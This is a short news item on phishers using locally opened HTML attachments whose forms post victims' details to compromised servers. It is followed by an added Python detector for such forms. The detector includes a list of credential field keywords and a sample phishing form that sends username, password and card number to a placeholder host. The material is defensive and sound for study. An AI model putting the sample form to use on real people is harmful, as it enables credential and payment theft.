Phishers use HTML attachments to evade browser blacklists

To get around phishing blacklists in browsers, scammers are luring people by using HTML attachments instead of URLs, a security firm is warning.

Chrome and Firefox are good at detecting phishing sites and warning Web surfers via a browser notice when they are about to visit a site that looks dangerous. So good, in fact, that scammers are resorting to a new tactic to lure victims into their traps via e-mails: attaching HTML files that are stored locally when they are opened, according to an M86 blog post yesterday.

After the user fills in a form with the information the scammers want to steal and clicks “submit,” the HTML form sends the data through a POST request to a PHP Hypertext Preprocessor script hosted on a legitimate Web server that has been compromised…

“Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective,” the blog post says…

To protect against this, people should avoid opening HTML attachments if the e-mail seems suspicious and [should] not provide any information in forms. Financial institutions do not send such attachments to customers.
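A mail filter can apply the same caution automatically. The sketch below is an added example, not code from M86 or the article: it parses an HTML attachment and reports any form that sends password-like fields to a remote web server, which is the pattern described above. The hint list, function names and sample attachment (including the host `compromised.example`) are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed, illustrative substrings that suggest a credential or payment field.
SENSITIVE_HINTS = ("pass", "pin", "card", "cvv", "ssn", "account")

class FormAuditor(HTMLParser):
    """Collects each <form> with its action, method and input fields."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", "").strip(),
                             "method": a.get("method", "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append(
                (a.get("type", "text").lower(), a.get("name", "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def audit_attachment(html_text):
    """Return findings for forms in a local HTML file that submit to a remote host."""
    parser = FormAuditor()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        remote = url.scheme in ("http", "https") and bool(url.netloc)
        sensitive = [name or ftype for ftype, name in form["fields"]
                     if ftype == "password" or any(h in name for h in SENSITIVE_HINTS)]
        if remote and sensitive:
            findings.append({"host": url.hostname, "path": url.path,
                             "method": form["method"], "sensitive_fields": sensitive})
    return findings

# Constructed sample attachment; the host and field names are placeholders.
SAMPLE = """<html><body><form method="POST"
 action="http://compromised.example/images/save.php">
<input type="text" name="username"><input type="password" name="password">
<input type="text" name="card_number"><input type="submit"></form></body></html>"""

if __name__ == "__main__":
    print(audit_attachment(SAMPLE))
```

A finding is a reason to quarantine the message for review, not proof of phishing; a form with a relative action, or one with no sensitive fields, is not reported.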

via CNET News.

